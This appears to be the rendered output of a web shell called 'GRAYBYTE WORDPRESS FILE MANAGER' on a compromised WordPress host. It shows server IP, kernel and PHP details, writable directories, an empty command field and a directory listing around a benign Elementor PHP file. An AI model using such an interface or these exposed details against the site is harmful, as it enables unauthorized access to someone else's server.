GRAYBYTE WORDPRESS FILE MANAGER8409

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/ccsactwb3.org/new2/wp-content/plugins/elementor/core/utils/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/ccsactwb3.org/new2/wp-content/plugins/elementor/core/utils//static-collection.php
<?php
namespace Elementor\Core\Utils;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Static_Collection {

	/**
	 * The current Collection instance.
	 *
	 * @var Collection
	 */
	protected $collection;

	/**
	 * Return only unique values.
	 *
	 * @var bool
	 */
	protected $unique_values = false;

	/**
	 * @inheritDoc
	 */
	public function __construct( array $items = [], $unique_values = false ) {
		$this->collection = new Collection( $items );
		$this->unique_values = $unique_values;
	}

	/**
	 * Since this class is a wrapper, every call will be forwarded to wrapped class.
	 * Most of the collection methods returns a new collection instance, and therefore
	 * it will be assigned as the current collection instance after executing any method.
	 *
	 * @param string $name
	 * @param array $arguments
	 */
	public function __call( $name, $arguments ) {
		$call = call_user_func_array( [ $this->collection, $name ], $arguments );

		if ( $call instanceof Collection ) {
			$this->collection = $this->unique_values ?
				$call->unique() :
				$call;
		}

		return $call;
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 08:35:41
giriqfky / giriqfky
0755
import-export
--
July 10 2025 08:35:41
giriqfky / giriqfky
0755
promotions
--
July 10 2025 08:35:41
giriqfky / giriqfky
0755
svg
--
July 10 2025 08:35:41
giriqfky / giriqfky
0755
assets-config-provider.php
1.486 KB
August 23 2023 17:47:32
giriqfky / giriqfky
0644
assets-translation-loader.php
2.5 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
collection.php
9.879 KB
April 28 2025 11:15:16
giriqfky / giriqfky
0644
exceptions.php
0.692 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
force-locale.php
3.555 KB
April 23 2023 15:22:46
giriqfky / giriqfky
0644
hints.php
10.26 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
http.php
0.958 KB
April 23 2023 15:22:46
giriqfky / giriqfky
0644
isolation-manager.php
0.405 KB
December 19 2024 15:59:46
giriqfky / giriqfky
0644
plugins-manager.php
2.84 KB
April 28 2025 11:15:16
giriqfky / giriqfky
0644
static-collection.php
1.085 KB
April 23 2023 15:22:46
giriqfky / giriqfky
0644
str.php
0.978 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
version.php
3.661 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF